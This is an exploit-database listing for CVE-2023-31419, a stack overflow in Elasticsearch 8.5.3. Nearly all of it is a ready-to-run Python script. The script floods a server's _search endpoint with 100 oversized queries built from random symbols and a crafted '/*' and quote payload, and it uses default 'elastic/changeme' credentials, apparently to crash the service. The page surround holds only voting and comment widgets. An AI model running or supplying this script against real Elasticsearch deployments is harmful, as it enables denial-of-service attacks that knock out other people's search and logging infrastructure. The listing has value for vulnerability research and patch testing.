Elasticsearch 8.5.3 Stack Overflow

2023.09.24
Risk: High
Local: No
Remote: Yes
CWE: CWE-119

# Exploit Author: TOUHAMI KASBAOUI # Vendor Homepage: https://elastic.co/ # Version: 8.5.3 / OpenSearch # Tested on: Ubuntu 20.04 LTS # CVE : CVE-2023-31419 # Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419 import requests import random import string es_url = 'http://localhost:9200' # Replace with your Elasticsearch server URL index_name = '*' payload = "/*" * 10000 + "\\" +"'" * 999 verify_ssl = False username = 'elastic' password = 'changeme' auth = (username, password) num_queries = 100 for _ in range(num_queries): symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000)) search_query = { "query": { "match": { "message": (symbols * 9000) + payload } } } print(f"Query {_ + 1} - Search Query:") search_endpoint = f'{es_url}/{index_name}/_search' response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth) if response.status_code == 200: search_results = response.json() print(f"Query {_ + 1} - Response:") print(search_results) total_hits = search_results['hits']['total']['value'] print(f"Query {_ + 1}: Total hits: {total_hits}") for hit in search_results['hits']['hits']: source_data = hit['_source'] print("Payload result: {search_results}") else: print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top